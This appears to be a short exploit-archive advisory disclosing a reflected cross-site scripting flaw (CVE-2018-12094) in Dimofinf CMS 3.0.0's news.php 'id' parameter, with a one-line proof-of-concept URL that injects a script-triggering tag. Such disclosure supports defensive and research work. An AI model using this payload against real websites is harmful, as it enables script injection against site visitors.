# Title: Dimofinf CMS 3.0.0 - Cross-Site Scripting # Author: Felipe "Renzi" Gabriel # Date: 2018-06-13 # Software: Dimofinf CMS Version 3.0.0 # CVE: CVE-2018-12094 # A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Dimofinf CMS" web-application. # The vulnerability is located in the 'id' parameter of the`news.php` action GET method request. # PoC http://Target/news.php?id=604""</|\><plaintext/onmouseover=prompt(/XSS/)>
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
